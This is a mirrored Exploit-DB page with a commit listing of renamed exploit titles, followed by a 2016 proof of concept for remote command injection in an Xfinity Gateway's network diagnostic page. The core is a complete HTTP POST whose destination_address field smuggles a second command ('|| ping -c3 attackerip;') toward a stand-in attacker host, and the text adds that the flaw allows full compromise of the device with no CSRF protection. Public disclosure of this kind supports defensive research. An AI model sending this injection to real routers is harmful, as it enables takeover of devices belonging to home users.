bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/hardware/webapps/40856.txt
Offensive Security 0a2e79b884 DB: 2016-12-04 
2 new exploits

FreeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated
freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated

FreeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)
freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)

FreeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)
freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)

FreeSSHd 1.2.4 - Denial of Service
freeSSHd 1.2.4 - Denial of Service

FreeSSHd - Denial of Service (PoC)
freeSSHd - Denial of Service (PoC)

onehttpd 0.7 - Denial of Service
OneHTTPD 0.7 - Denial of Service

FreeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service
freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service

FreeSSHd 1.3.1 - Denial of Service
freeSSHd 1.3.1 - Denial of Service

Microsoft Internet Explorer 9 < 11 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)
Microsoft Internet Explorer 9/10/11 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)

Microsoft Internet Explorer 8 / 9 / 10 / 11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)
Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)

Microsoft Windows 8.0 < 8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)
Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)

FreeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow
freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow

FreeSSHd 1.2.1 - Authenticated Remote SEH Overflow
freeSSHd 1.2.1 - Authenticated Remote SEH Overflow

FreeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)
freeSSHd 1.2.1 - 'rename' Command Remote Buffer Overflow (SEH)

FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)
freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit)

FreeSSHd 2.1.3 - Remote Authentication Bypass
freeSSHd 2.1.3 - Remote Authentication Bypass

FreeSSHd 1.2.6 - Authentication Bypass (Metasploit)
freeSSHd 1.2.6 - Authentication Bypass (Metasploit)

Microsoft Internet Explorer 8<11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)
Microsoft Internet Explorer 8/9/10/11_ IIS_ CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)

Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution

Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection
Joomla! Component MyContent 1.1.13 - Blind SQL Injection

Xfinity Gateway - Remote Code Execution
2016-12-04 05:01:23 +00:00

33 lines
1.4 KiB
Text
Executable file
Raw Blame History

# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://xfinity.com
# Platform: php
The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.
PoC:
POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection. This can be leveraged to completely compromise the device.
This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/
Reference in a new issue View git blame Copy permalink